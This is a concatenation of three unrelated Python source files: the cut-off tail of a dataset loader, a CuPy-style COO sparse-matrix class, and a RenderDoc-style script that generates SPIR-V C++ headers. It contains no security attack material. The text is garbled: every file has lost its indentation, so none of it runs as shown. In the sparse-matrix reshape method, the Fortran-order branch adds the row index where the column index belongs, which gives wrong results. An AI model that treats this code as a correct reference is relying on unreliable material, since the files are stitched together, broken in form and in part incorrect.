pad_up_to_batches=test_num_batches)
val_num_batches = int(
np.ceil(dataset_builder.info.splits["validation"].num_examples /
(config.global_batch_size))) * strategy.num_replicas_in_sync
val_ds = deterministic_data.create_distributed_dataset(
dataset_builder,
strategy=strategy,
global_batch_size=config.global_batch_size,
split=val_split,
num_epochs=1,
shuffle=False,
cache=True,
preprocess_fn=eval_preprocess_fn,
pad_up_to_batches=val_num_batches)
if config.dataset == "inaturalist18":
test_ds = val_ds
return dataset_builder.info, train_ds, val_ds, test_ds
|
|
import numpy
try:
import scipy.sparse
_scipy_available = True
except ImportError:
_scipy_available = False
import cupy
from cupy import _core
from cupy import cusparse
from cupyx.scipy.sparse import _base
from cupyx.scipy.sparse import _csc
from cupyx.scipy.sparse import _csr
from cupyx.scipy.sparse import _data as sparse_data
from cupyx.scipy.sparse import _util
from cupyx.scipy.sparse import _sputils
class coo_matrix(sparse_data._data_matrix):
"""COOrdinate format sparse matrix.
This can be instantiated in several ways.
``coo_matrix(D)``
``D`` is a rank-2 :class:`cupy.ndarray`.
``coo_matrix(S)``
``S`` is another sparse matrix. It is equivalent to ``S.tocoo()``.
``coo_matrix((M, N), [dtype])``
It constructs an empty matrix whose shape is ``(M, N)``. Default dtype
is float64.
``coo_matrix((data, (row, col)))``
All ``data``, ``row`` and ``col`` are one-dimenaional
:class:`cupy.ndarray`.
Args:
arg1: Arguments for the initializer.
shape (tuple): Shape of a matrix. Its length must be two.
dtype: Data type. It must be an argument of :class:`numpy.dtype`.
copy (bool): If ``True``, copies of given data are always used.
.. seealso::
:class:`scipy.sparse.coo_matrix`
"""
format = 'coo'
_sum_duplicates_diff = _core.ElementwiseKernel(
'raw T row, raw T col',
'T diff',
'''
T diff_out = 1;
if (i == 0 || row[i - 1] == row[i] && col[i - 1] == col[i]) {
diff_out = 0;
}
diff = diff_out;
''', 'cupyx_scipy_sparse_coo_sum_duplicates_diff')
def __init__(self, arg1, shape=None, dtype=None, copy=False):
if shape is not None and len(shape) != 2:
raise ValueError(
'Only two-dimensional sparse arrays are supported.')
if _base.issparse(arg1):
x = arg1.asformat(self.format)
data = x.data
row = x.row
col = x.col
if arg1.format != self.format:
# When formats are differnent, all arrays are already copied
copy = False
if shape is None:
shape = arg1.shape
self.has_canonical_format = x.has_canonical_format
elif _util.isshape(arg1):
m, n = arg1
m, n = int(m), int(n)
data = cupy.zeros(0, dtype if dtype else 'd')
row = cupy.zeros(0, dtype='i')
col = cupy.zeros(0, dtype='i')
# shape and copy argument is ignored
shape = (m, n)
copy = False
self.has_canonical_format = True
elif _scipy_available and scipy.sparse.issparse(arg1):
# Convert scipy.sparse to cupyx.scipy.sparse
x = arg1.tocoo()
data = cupy.array(x.data)
row = cupy.array(x.row, dtype='i')
col = cupy.array(x.col, dtype='i')
copy = False
if shape is None:
shape = arg1.shape
self.has_canonical_format = x.has_canonical_format
elif isinstance(arg1, tuple) and len(arg1) == 2:
try:
data, (row, col) = arg1
except (TypeError, ValueError):
raise TypeError('invalid input format')
if not (_base.isdense(data) and data.ndim == 1 and
_base.isdense(row) and row.ndim == 1 and
_base.isdense(col) and col.ndim == 1):
raise ValueError('row, column, and data arrays must be 1-D')
if not (len(data) == len(row) == len(col)):
raise ValueError(
'row, column, and data array must all be the same length')
self.has_canonical_format = False
elif _base.isdense(arg1):
if arg1.ndim > 2:
raise TypeError('expected dimension <= 2 array or matrix')
dense = cupy.atleast_2d(arg1)
row, col = dense.nonzero()
data = dense[row, col]
shape = dense.shape
self.has_canonical_format = True
else:
raise TypeError('invalid input format')
if dtype is None:
dtype = data.dtype
else:
dtype = numpy.dtype(dtype)
if dtype != 'f' and dtype != 'd' and dtype != 'F' and dtype != 'D':
raise ValueError(
'Only float32, float64, complex64 and complex128'
' are supported')
data = data.astype(dtype, copy=copy)
row = row.astype('i', copy=copy)
col = col.astype('i', copy=copy)
if shape is None:
if len(row) == 0 or len(col) == 0:
raise ValueError(
'cannot infer dimensions from zero sized index arrays')
shape = (int(row.max()) + 1, int(col.max()) + 1)
if len(data) > 0:
if row.max() >= shape[0]:
raise ValueError('row index exceeds matrix dimensions')
if col.max() >= shape[1]:
raise ValueError('column index exceeds matrix dimensions')
if row.min() < 0:
raise ValueError('negative row index found')
if col.min() < 0:
raise ValueError('negative column index found')
sparse_data._data_matrix.__init__(self, data)
self.row = row
self.col = col
if not _util.isshape(shape):
raise ValueError('invalid shape (must be a 2-tuple of int)')
self._shape = int(shape[0]), int(shape[1])
def _with_data(self, data, copy=True):
"""Returns a matrix with the same sparsity structure as self,
but with different data. By default the index arrays
(i.e. .row and .col) are copied.
"""
if copy:
return coo_matrix(
(data, (self.row.copy(), self.col.copy())),
shape=self.shape, dtype=data.dtype)
else:
return coo_matrix(
(data, (self.row, self.col)), shape=self.shape,
dtype=data.dtype)
def diagonal(self, k=0):
"""Returns the k-th diagonal of the matrix.
Args:
k (int, optional): Which diagonal to get, corresponding to elements
a[i, i+k]. Default: 0 (the main diagonal).
Returns:
cupy.ndarray : The k-th diagonal.
"""
rows, cols = self.shape
if k <= -rows or k >= cols:
return cupy.empty(0, dtype=self.data.dtype)
diag = cupy.zeros(min(rows + min(k, 0), cols - max(k, 0)),
dtype=self.dtype)
diag_mask = (self.row + k) == self.col
if self.has_canonical_format:
row = self.row[diag_mask]
data = self.data[diag_mask]
else:
diag_coo = coo_matrix((self.data[diag_mask],
(self.row[diag_mask], self.col[diag_mask])),
shape=self.shape)
diag_coo.sum_duplicates()
row = diag_coo.row
data = diag_coo.data
diag[row + min(k, 0)] = data
return diag
def setdiag(self, values, k=0):
"""Set diagonal or off-diagonal elements of the array.
Args:
values (ndarray): New values of the diagonal elements. Values may
have any length. If the diagonal is longer than values, then
the remaining diagonal entries will not be set. If values are
longer than the diagonal, then the remaining values are
ignored. If a scalar value is given, all of the diagonal is set
to it.
k (int, optional): Which off-diagonal to set, corresponding to
elements a[i,i+k]. Default: 0 (the main diagonal).
"""
M, N = self.shape
if (k > 0 and k >= N) or (k < 0 and -k >= M):
raise ValueError("k exceeds matrix dimensions")
if values.ndim and not len(values):
return
idx_dtype = self.row.dtype
# Determine which triples to keep and where to put the new ones.
full_keep = self.col - self.row != k
if k < 0:
max_index = min(M + k, N)
if values.ndim:
max_index = min(max_index, len(values))
keep = cupy.logical_or(full_keep, self.col >= max_index)
new_row = cupy.arange(-k, -k + max_index, dtype=idx_dtype)
new_col = cupy.arange(max_index, dtype=idx_dtype)
else:
max_index = min(M, N - k)
if values.ndim:
max_index = min(max_index, len(values))
keep = cupy.logical_or(full_keep, self.row >= max_index)
new_row = cupy.arange(max_index, dtype=idx_dtype)
new_col = cupy.arange(k, k + max_index, dtype=idx_dtype)
# Define the array of data consisting of the entries to be added.
if values.ndim:
new_data = values[:max_index]
else:
new_data = cupy.empty(max_index, dtype=self.dtype)
new_data[:] = values
# Update the internal structure.
self.row = cupy.concatenate((self.row[keep], new_row))
self.col = cupy.concatenate((self.col[keep], new_col))
self.data = cupy.concatenate((self.data[keep], new_data))
self.has_canonical_format = False
def eliminate_zeros(self):
"""Removes zero entories in place."""
ind = self.data != 0
self.data = self.data[ind]
self.row = self.row[ind]
self.col = self.col[ind]
def get_shape(self):
"""Returns the shape of the matrix.
Returns:
tuple: Shape of the matrix.
"""
return self._shape
def getnnz(self, axis=None):
"""Returns the number of stored values, including explicit zeros."""
if axis is None:
return self.data.size
else:
raise ValueError
def get(self, stream=None):
"""Returns a copy of the array on host memory.
Args:
stream (cupy.cuda.Stream): CUDA stream object. If it is given, the
copy runs asynchronously. Otherwise, the copy is synchronous.
Returns:
scipy.sparse.coo_matrix: Copy of the array on host memory.
"""
if not _scipy_available:
raise RuntimeError('scipy is not available')
data = self.data.get(stream)
row = self.row.get(stream)
col = self.col.get(stream)
return scipy.sparse.coo_matrix(
(data, (row, col)), shape=self.shape)
def reshape(self, *shape, order='C'):
"""Gives a new shape to a sparse matrix without changing its data.
Args:
shape (tuple):
The new shape should be compatible with the original shape.
order: {'C', 'F'} (optional)
Read the elements using this index order. 'C' means to read and
write the elements using C-like index order. 'F' means to read
and write the elements using Fortran-like index order. Default:
C.
Returns:
cupyx.scipy.sparse.coo_matrix: sparse matrix
"""
shape = _sputils.check_shape(shape, self.shape)
if shape == self.shape:
return self
nrows, ncols = self.shape
if order == 'C': # C to represent matrix in row major format
dtype = _sputils.get_index_dtype(
maxval=(ncols * max(0, nrows - 1) + max(0, ncols - 1)))
flat_indices = cupy.multiply(ncols, self.row,
dtype=dtype) + self.col
new_row, new_col = divmod(flat_indices, shape[1])
elif order == 'F':
dtype = _sputils.get_index_dtype(
maxval=(ncols * max(0, nrows - 1) + max(0, ncols - 1)))
flat_indices = cupy.multiply(ncols, self.row,
dtype=dtype) + self.row
new_col, new_row = divmod(flat_indices, shape[0])
else:
raise ValueError("'order' must be 'C' or 'F'")
new_data = self.data
return coo_matrix((new_data, (new_row, new_col)), shape=shape,
copy=False)
def sum_duplicates(self):
"""Eliminate duplicate matrix entries by adding them together.
.. warning::
When sorting the indices, CuPy follows the convention of cuSPARSE,
which is different from that of SciPy. Therefore, the order of the
output indices may differ:
.. code-block:: python
>>> # 1 0 0
>>> # A = 1 1 0
>>> # 1 1 1
>>> data = cupy.array([1, 1, 1, 1, 1, 1], 'f')
>>> row = cupy.array([0, 1, 1, 2, 2, 2], 'i')
>>> col = cupy.array([0, 0, 1, 0, 1, 2], 'i')
>>> A = cupyx.scipy.sparse.coo_matrix((data, (row, col)),
... shape=(3, 3))
>>> a = A.get()
>>> A.sum_duplicates()
>>> a.sum_duplicates() # a is scipy.sparse.coo_matrix
>>> A.row
array([0, 1, 1, 2, 2, 2], dtype=int32)
>>> a.row
array([0, 1, 2, 1, 2, 2], dtype=int32)
>>> A.col
array([0, 0, 1, 0, 1, 2], dtype=int32)
>>> a.col
array([0, 0, 0, 1, 1, 2], dtype=int32)
.. warning::
Calling this function might synchronize the device.
.. seealso::
:meth:`scipy.sparse.coo_matrix.sum_duplicates`
"""
if self.has_canonical_format:
return
# Note: The sorting order below follows the cuSPARSE convention (first
# row then col, so-called row-major) and differs from that of SciPy, as
# the cuSPARSE functions such as cusparseSpMV() assume this sorting
# order.
# See https://docs.nvidia.com/cuda/cusparse/index.html#coo-format
keys = cupy.stack([self.col, self.row])
order = cupy.lexsort(keys)
src_data = self.data[order]
src_row = self.row[order]
src_col = self.col[order]
diff = self._sum_duplicates_diff(src_row, src_col, size=self.row.size)
if diff[1:].all():
# All elements have different indices.
data = src_data
row = src_row
col = src_col
else:
# TODO(leofang): move the kernels outside this method
index = cupy.cumsum(diff, dtype='i')
size = int(index[-1]) + 1
data = cupy.zeros(size, dtype=self.data.dtype)
row = cupy.empty(size, dtype='i')
col = cupy.empty(size, dtype='i')
if self.data.dtype.kind == 'f':
cupy.ElementwiseKernel(
'T src_data, int32 src_row, int32 src_col, int32 index',
'raw T data, raw int32 row, raw int32 col',
'''
atomicAdd(&data[index], src_data);
row[index] = src_row;
col[index] = src_col;
''',
'cupyx_scipy_sparse_coo_sum_duplicates_assign'
)(src_data, src_row, src_col, index, data, row, col)
elif self.data.dtype.kind == 'c':
cupy.ElementwiseKernel(
'T src_real, T src_imag, int32 src_row, int32 src_col, '
'int32 index',
'raw T real, raw T imag, raw int32 row, raw int32 col',
'''
atomicAdd(&real[index], src_real);
atomicAdd(&imag[index], src_imag);
row[index] = src_row;
col[index] = src_col;
''',
'cupyx_scipy_sparse_coo_sum_duplicates_assign_complex'
)(src_data.real, src_data.imag, src_row, src_col, index,
data.real, data.imag, row, col)
self.data = data
self.row = row
self.col = col
self.has_canonical_format = True
def toarray(self, order=None, out=None):
"""Returns a dense matrix representing the same value.
Args:
order (str): Not supported.
out: Not supported.
Returns:
cupy.ndarray: Dense array representing the same value.
.. seealso:: :meth:`scipy.sparse.coo_matrix.toarray`
"""
return self.tocsr().toarray(order=order, out=out)
def tocoo(self, copy=False):
"""Converts the matrix to COOdinate format.
Args:
copy (bool): If ``False``, it shares data arrays as much as
possible.
Returns:
cupyx.scipy.sparse.coo_matrix: Converted matrix.
"""
if copy:
return self.copy()
else:
return self
def tocsc(self, copy=False):
"""Converts the matrix to Compressed Sparse Column format.
Args:
copy (bool): If ``False``, it shares data arrays as much as
possible. Actually this option is ignored because all
arrays in a matrix cannot be shared in coo to csc conversion.
Returns:
cupyx.scipy.sparse.csc_matrix: Converted matrix.
"""
if self.nnz == 0:
return _csc.csc_matrix(self.shape, dtype=self.dtype)
# copy is silently ignored (in line with SciPy) because both
# sum_duplicates and coosort change the underlying data
x = self.copy()
x.sum_duplicates()
cusparse.coosort(x, 'c')
x = cusparse.coo2csc(x)
x.has_canonical_format = True
return x
def tocsr(self, copy=False):
"""Converts the matrix to Compressed Sparse Row format.
Args:
copy (bool): If ``False``, it shares data arrays as much as
possible. Actually this option is ignored because all
arrays in a matrix cannot be shared in coo to csr conversion.
Returns:
cupyx.scipy.sparse.csr_matrix: Converted matrix.
"""
if self.nnz == 0:
return _csr.csr_matrix(self.shape, dtype=self.dtype)
# copy is silently ignored (in line with SciPy) because both
# sum_duplicates and coosort change the underlying data
x = self.copy()
x.sum_duplicates()
cusparse.coosort(x, 'r')
x = cusparse.coo2csr(x)
x.has_canonical_format = True
return x
def transpose(self, axes=None, copy=False):
"""Returns a transpose matrix.
Args:
axes: This option is not supported.
copy (bool): If ``True``, a returned matrix shares no data.
Otherwise, it shared data arrays as much as possible.
Returns:
cupyx.scipy.sparse.spmatrix: Transpose matrix.
"""
if axes is not None:
raise ValueError(
'Sparse matrices do not support an \'axes\' parameter because '
'swapping dimensions is the only logical permutation.')
shape = self.shape[1], self.shape[0]
return coo_matrix(
(self.data, (self.col, self.row)), shape=shape, copy=copy)
def isspmatrix_coo(x):
"""Checks if a given matrix is of COO format.
Returns:
bool: Returns if ``x`` is :class:`cupyx.scipy.sparse.coo_matrix`.
"""
return isinstance(x, coo_matrix)
|
|
#!/usr/bin/env python3
import os
import io
import sys
import re
import argparse
import json
import xml.etree.ElementTree as ET
# on msys, use crlf output
nl = None
if sys.platform == 'msys':
nl = "\r\n"
# Get the file, relative to this script's location (same directory)
# that way we're not sensitive to CWD
pathname = os.path.abspath(os.path.dirname(sys.argv[0])) + os.path.sep
with open(pathname + 'spirv.core.grammar.json', mode='r') as f:
spirv = json.load(f)
with open(pathname + 'extinst.glsl.std.450.grammar.json', mode='r') as f:
glsl450 = json.load(f)
# open XML registry
registry = ET.parse(pathname + 'spir-v.xml').getroot()
# open the file for write
header = open(pathname + 'spirv_gen.h', mode='w', newline = nl)
ops_header = open(pathname + 'spirv_op_helpers.h', mode='w', newline = nl)
cpp = open(pathname + 'spirv_gen.cpp', mode='w', newline = nl)
###############################################################################
##
## Headers
##
###############################################################################
def prefix_star(line):
if line == '':
return ' *'
else:
return ' * ' + line
def operand_name(name, lowercase_first = True):
name = name.replace('\n', ' ')
# special case a few very awkward names
if re.search(r'member [0-9].*\.\.\.', name, re.RegexFlag.I):
return 'members'
if re.search(r'parameter [0-9].*\.\.\.', name, re.RegexFlag.I):
return 'parameters'
if re.search(r'argument [0-9].*\.\.\.', name, re.RegexFlag.I):
return 'arguments'
if re.search(r'variable, parent.*\.\.\.', name, re.RegexFlag.I):
return 'parents'
name = re.sub(r'<<(.*),(.*)>>', r'\2', name)
name = re.sub(r'[ \'~<>./-]', '', name)
if name.lower() == 'interface':
return 'iface'
if name.lower() == 'default':
return 'def'
if lowercase_first:
return name[0].lower() + name[1:]
else:
return name
copyright = '''
/******************************************************************************
* The MIT License (MIT)
*
* Copyright (c) 2019-2021 Baldur Karlsson
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
******************************************************************************/
/******************************************************************************
* Generated from Khronos SPIR-V machine-readable JSON grammar.
*
{}
******************************************************************************/
'''.format("\n".join([prefix_star(line.strip()) for line in spirv['copyright']])).strip()
header.write('''{copyright}
#pragma once
// This file is autogenerated with gen_spirv_code.py - any changes will be overwritten next time
// that script is run.
// $ ./gen_spirv_code.py
// We need to disable clang-format since this file is programmatically generated
// clang-format off
#include <stdint.h>
#include "api/replay/apidefs.h"
#include "api/replay/stringise.h"
#undef None
#undef CopyMemory
#undef MemoryBarrier
namespace rdcspv
{{
static const uint32_t MagicNumber = {magic};
static const uint32_t VersionMajor = {major};
static const uint32_t VersionMinor = {minor};
static const uint32_t VersionRevision = {revision};
static const uint32_t VersionPacked = ({major} << 16) | ({minor} << 8);
static const uint32_t OpCodeMask = 0xffff;
static const uint32_t WordCountShift = 16;
static const uint32_t FirstRealWord = 5;
struct Id
{{
constexpr inline Id() : id(0) {{}}
// only allow explicit functions to cast to/from uint32_t
constexpr static inline Id fromWord(uint32_t i) {{ return Id(i); }}
inline uint32_t value() const {{ return id; }}
constexpr inline explicit operator bool() const {{ return id != 0; }}
constexpr inline bool operator==(const Id o) const {{ return id == o.id; }}
constexpr inline bool operator!=(const Id o) const {{ return id != o.id; }}
constexpr inline bool operator<(const Id o) const {{ return id < o.id; }}
constexpr inline bool operator==(const uint32_t o) const {{ return id == o; }}
constexpr inline bool operator!=(const uint32_t o) const {{ return id != o; }}
constexpr inline bool operator<(const uint32_t o) const {{ return id < o; }}
private:
constexpr inline Id(uint32_t i) : id(i) {{}}
uint32_t id;
}};
enum class Generator : uint32_t
{{'''.format(copyright = copyright, magic = spirv['magic_number'], major = spirv['major_version'], minor = spirv['minor_version'], revision = spirv['revision']))
generator_tostr = ''
for gen in registry.findall('ids[@type=\'vendor\']/id[@tool]'):
name = operand_name(gen.attrib['tool'], lowercase_first=False)
tostr = '{} from {} - {}'.format(gen.attrib['tool'], gen.attrib['vendor'], gen.attrib['comment'])
generator_tostr += ' STRINGISE_ENUM_CLASS_NAMED({}, "{}");\n'.format(name, tostr.replace('"', '\\"').replace('\\', '\\\\'))
header.write('\n {} = {},'.format(name, gen.attrib['value']))
header.write('\n};\n\n')
ops_header.write('''{copyright}
#pragma once
// This file is autogenerated with gen_spirv_code.py - any changes will be overwritten next time
// that script is run.
// $ ./gen_spirv_code.py
// We need to disable clang-format since this file is programmatically generated
// clang-format off
#include <functional>
#include <set>
#include <stdint.h>
#include "api/replay/apidefs.h"
#include "api/replay/rdcstr.h"
#include "api/replay/rdcarray.h"
#include "api/replay/stringise.h"
#undef None
#undef CopyMemory
#undef MemoryBarrier
#include "spirv_common.h"
#include "spirv_gen.h"
namespace rdcspv
{{
template<typename Type>
Type DecodeParam(const ConstIter &it, uint32_t &word);
template<>
inline uint32_t DecodeParam(const ConstIter &it, uint32_t &word)
{{
if(word >= it.size()) return 0;
uint32_t ret = it.word(word);
word += 1;
return ret;
}}
template<>
inline Id DecodeParam<Id>(const ConstIter &it, uint32_t &word)
{{
if(word >= it.size()) return Id();
Id ret = Id::fromWord(it.word(word));
word += 1;
return ret;
}}
template<>
inline rdcstr DecodeParam<rdcstr>(const ConstIter &it, uint32_t &word)
{{
if(word >= it.size()) return "";
rdcstr ret = (const char *)&it.word(word);
word += uint32_t(ret.size() / 4) + 1;
return ret;
}}
template<typename Type>
rdcarray<Type> MultiParam(const ConstIter &it, uint32_t &word)
{{
rdcarray<Type> ret;
while(word < it.size())
{{
Type t = DecodeParam<Type>(it, word);
ret.push_back(t);
}}
return ret;
}}
inline void EncodeParam(rdcarray<uint32_t> &words, const rdcstr &str)
{{
size_t i=0, remainingChars = str.size() + 1;
while(remainingChars > 0)
{{
uint32_t word = 0;
for(size_t w=0; w < remainingChars && w < 4; w++)
word |= uint32_t(str[i+w]) << (w*8);
words.push_back(word);
i += 4;
if(remainingChars < 4)
remainingChars = 0;
else
remainingChars -= 4;
}}
}}
'''.format(copyright = copyright))
cpp.write('''{copyright}
// This file is autogenerated with gen_spirv_code.py - any changes will be overwritten next time
// that script is run.
// $ ./gen_spirv_code.py
// We need to disable clang-format since this file is programmatically generated
// clang-format off
#include "spirv_gen.h"
#include "os/os_specific.h"
#include "common/formatting.h"
#include "spirv_op_helpers.h"
'''.format(copyright = copyright))
###############################################################################
##
## Operands (declare enums, stringise, preprocess)
##
###############################################################################
positional_names = [ 'first', 'second', 'third' ]
kinds = {}
for operand_kind in spirv['operand_kinds']:
name = operand_kind['kind']
if 'enumerants' in operand_kind:
operand_kind['has_params'] = any(['parameters' in value for value in operand_kind['enumerants']])
else:
operand_kind['has_params'] = False
kinds[name] = operand_kind
operand_kind['push_words'] = lambda name: 'words.push_back((uint32_t){});'.format(name)
operand_kind['from_words'] = None
operand_kind['is_id'] = False
if operand_kind['category'] == 'ValueEnum':
operand_kind['size'] = 1
operand_kind['def_name'] = name[0].lower() + name[1:]
operand_kind['def_value'] = name + '::Invalid'
operand_kind['type'] = name
decl = ''
stringise = ''
used = []
for value in operand_kind['enumerants']:
value_name = value['enumerant']
if value_name[0].isdigit():
value_name = '_' + value_name
decl += ' {} = {},\n'.format(value_name, value['value'])
if value['value'] in used:
continue
used.append(value['value'])
if value_name != value['enumerant']:
stringise += ' STRINGISE_ENUM_CLASS_NAMED({}, "{}");\n'.format(value_name, value['enumerant'])
else:
stringise += ' STRINGISE_ENUM_CLASS({});\n'.format(value_name)
header.write('''enum class {name} : uint32_t
{{
{values}
Max,
Invalid = ~0U,
}};
'''.format(name = name, values = decl.rstrip()))
cpp.write('''template <>
rdcstr DoStringise(const rdcspv::{name} &el)
{{
BEGIN_ENUM_STRINGISE(rdcspv::{name});
{{
{values}
}}
END_ENUM_STRINGISE();
}}
'''.format(name = name, values = stringise.rstrip()))
elif operand_kind['category'] == 'BitEnum':
operand_kind['size'] = 1
operand_kind['def_name'] = name[0].lower() + name[1:]
operand_kind['def_value'] = name + '::None'
operand_kind['type'] = name
used = []
decl = ''
stringise = ''
for value in operand_kind['enumerants']:
decl += ' {} = {},\n'.format(value['enumerant'], value['value'])
if value['value'] in used:
continue
used.append(value['value'])
if value['enumerant'] == 'None':
stringise += ' STRINGISE_BITFIELD_CLASS_VALUE(None);\n\n'
else:
stringise += ' STRINGISE_BITFIELD_CLASS_BIT({});\n'.format(value['enumerant'])
header.write('''enum class {name} : uint32_t
{{
{values}
Max,
Invalid = ~0U,
}};
BITMASK_OPERATORS({name});
'''.format(name = name, values = decl.rstrip()))
cpp.write('''template <>
rdcstr DoStringise(const rdcspv::{name} &el)
{{
BEGIN_BITFIELD_STRINGISE(rdcspv::{name});
{{
{values}
}}
END_BITFIELD_STRINGISE();
}}
'''.format(name = name, values = stringise.rstrip()))
# Hardcoded special types that we hardcode behaviour for
elif (operand_kind['kind'] == 'IdRef'):
operand_kind['size'] = 1
operand_kind['def_name'] = 'id'
operand_kind['def_value'] = 'Id()'
operand_kind['type'] = 'Id'
operand_kind['is_id'] = True
operand_kind['push_words'] = lambda name: 'words.push_back({}.value());'.format(name)
operand_kind['from_words'] = lambda name: 'Id::fromWord({})'.format(name)
elif (operand_kind['kind'] == 'IdResultType' or
operand_kind['kind'] == 'IdResult' or
operand_kind['kind'] == 'IdMemorySemantics' or
operand_kind['kind'] == 'IdScope'):
operand_kind['size'] = 1
operand_kind['type'] = name
operand_kind['is_id'] = True
operand_kind['def_name'] = name[2].lower() + name[3:]
operand_kind['def_value'] = name + '()'
operand_kind['push_words'] = lambda name: 'words.push_back({}.value());'.format(name)
operand_kind['from_words'] = lambda name: 'Id::fromWord({})'.format(name)
header.write('using {} = Id;\n\n'.format(name))
# For simplicity, assume literal integers are 32-bit in size
elif (operand_kind['kind'] == 'LiteralInteger'):
operand_kind['size'] = 1
operand_kind['def_name'] = 'num'
operand_kind['def_value'] = '0'
operand_kind['type'] = 'uint32_t'
elif (operand_kind['kind'] == 'LiteralString'):
operand_kind['size'] = -1000000
operand_kind['type'] = 'rdcstr'
operand_kind['def_name'] = 'str'
operand_kind['def_value'] = '""'
operand_kind['push_words'] = lambda name: 'EncodeParam(words, {});'.format(name)
operand_kind['from_words'] = lambda name: 'DecodeParam({})'.format(name)
elif (operand_kind['kind'] == 'LiteralContextDependentNumber' or
operand_kind['kind'] == 'LiteralExtInstInteger' or
operand_kind['kind'] == 'LiteralSpecConstantOpInteger'):
operand_kind['size'] = None
elif (operand_kind['kind'] == 'PairLiteralIntegerIdRef'):
operand_kind['size'] = 2
operand_kind['def_name'] = name[0].lower() + name[1:]
operand_kind['def_value'] = '{0, Id()}'
operand_kind['type'] = name
operand_kind['push_words'] = lambda name: 'words.push_back((uint32_t){0}.first); words.push_back({0}.second.value());'.format(name)
ops_header.write('struct {} {{ uint32_t first; Id second; }};\n\n'.format(name))
elif (operand_kind['kind'] == 'PairIdRefLiteralInteger'):
operand_kind['size'] = 2
operand_kind['def_name'] = name[0].lower() + name[1:]
operand_kind['def_value'] = '{Id(), 0}'
operand_kind['type'] = name
operand_kind['push_words'] = lambda name: 'words.push_back({0}.first.value()); words.push_back((uint32_t){0}.second);'.format(name)
ops_header.write('struct {} {{ Id first; uint32_t second; }};\n\n'.format(name))
elif (operand_kind['kind'] == 'PairIdRefIdRef'):
operand_kind['size'] = 2
operand_kind['def_name'] = name[0].lower() + name[1:]
operand_kind['def_value'] = '{Id(), Id()}'
operand_kind['type'] = name
operand_kind['push_words'] = lambda name: 'words.push_back({0}.first.value()); words.push_back({0}.second.value());'.format(name)
ops_header.write('struct {} {{ Id first, second; }};\n\n'.format(name))
continue
else:
raise TypeError("Unexpected operand {} of type {}".format(operand_kind['kind'], operand_kind['category']))
if operand_kind['from_words'] is None:
operand_kind['from_words'] = lambda name,kind=operand_kind: '({}){}'.format(kind['type'], name)
ops_header.write('''
template<>
inline PairIdRefIdRef DecodeParam(const ConstIter &it, uint32_t &word)
{
if(word >= it.size()) return {};
PairIdRefIdRef ret = { Id::fromWord(it.word(word)), Id::fromWord(it.word(word+1)) };
word += 2;
return ret;
}
template<>
inline PairLiteralIntegerIdRef DecodeParam(const ConstIter &it, uint32_t &word)
{
if(word >= it.size()) return {};
PairLiteralIntegerIdRef ret = { it.word(word), Id::fromWord(it.word(word+1)) };
word += 2;
return ret;
}
template<>
inline PairIdRefLiteralInteger DecodeParam(const ConstIter &it, uint32_t &word)
{
if(word >= it.size()) return {};
PairIdRefLiteralInteger ret = { Id::fromWord(it.word(word)), it.word(word+1) };
word += 2;
return ret;
}
''')
tostrs = ''
tostr_decls = ''
# Second pass to declare operand parameter structs in ops helper header
for operand_kind in spirv['operand_kinds']:
name = operand_kind['kind']
if not operand_kind['has_params']:
if operand_kind['category'] == 'ValueEnum':
ops_header.write('inline uint16_t OptionalWordCount(const {0} val) {{ return val != {0}::Invalid ? 1 : 0; }}\n\n'.format(name))
continue
values = ''
set_unset = ''
word_count_cases = ''
decode_cases = ''
encode_cases = ''
constructors = ''
tostr_cases = ''
value_enum = operand_kind['category'] == 'ValueEnum'
bit_enum = operand_kind['category'] == 'BitEnum'
used = []
for value in operand_kind['enumerants']:
params = ''
assign = ''
ret_assign = ''
new_value = value['value'] not in used
used.append(value['value'])
if new_value and bit_enum:
tostr_cases += ' if(el.flags & {0}::{1})\n ret += "{1}"'.format(name, value['enumerant'])
if 'parameters' in value:
# We want plain unions, so don't include strings
if any([param['kind'] == 'LiteralString' for param in value['parameters']]):
continue
if new_value and value_enum:
tostr_cases += ' case {0}::{1}:\n ret += '.format(name, value['enumerant'])
member = ""
param_name = operand_name(value['enumerant'])
size = 0
if new_value:
if value_enum:
decode_cases += ' case {0}::{1}:\n'.format(name, value['enumerant'])
encode_cases += ' case {0}::{1}:\n'.format(name, value['enumerant'])
else:
decode_cases += ' if(ret.flags & {0}::{1})\n {{\n'.format(name, value['enumerant'])
encode_cases += ' if(param.flags & {0}::{1})\n {{\n'.format(name, value['enumerant'])
# if we only have one parameter, add its type to the set
if len(value['parameters']) == 1:
param = value['parameters'][0]
size += kinds[param['kind']]['size']
param_type = kinds[param['kind']]['type']
member = "{} {};\n".format(param_type, param_name)
if value_enum:
values += ' '
if new_value:
decode_cases += ' '
encode_cases += ' '
values += " " + member
params += "{} {}Param".format(param_type, param_name)
assign += " {0} = {0}Param;".format(param_name)
ret_assign += " ret.{0} = {0};\n".format(param_name)
if new_value:
decode_cases += ' ret.{} = {};\n'.format(param_name, kinds[param['kind']]['from_words']('it.word(word)'))
encode_cases += ' {}\n'.format(kinds[param['kind']]['push_words']('param.{}'.format(param_name)))
if kinds[param['kind']]['is_id']:
tostr_cases += ' "(" + idName(el.{}) + ")"'.format(param_name)
else:
tostr_cases += ' "(" + ToStr(el.{}) + ")"'.format(param_name)
# if we have multiple we need a separate struct for this thing
else:
struct_name = param_name[0].upper() + param_name[1:] + 'Params'
member = "{} {};\n".format(struct_name, param_name)
if value_enum:
values += ' '
values += " " + member
struct_values = ''
if new_value:
tostr_cases += ' "("'
for i,param in enumerate(value['parameters']):
subparam_name = positional_names[i]
kind = kinds[param['kind']]
size += kind['size']
if 'name' in param:
subparam_name = operand_name(param['name'])
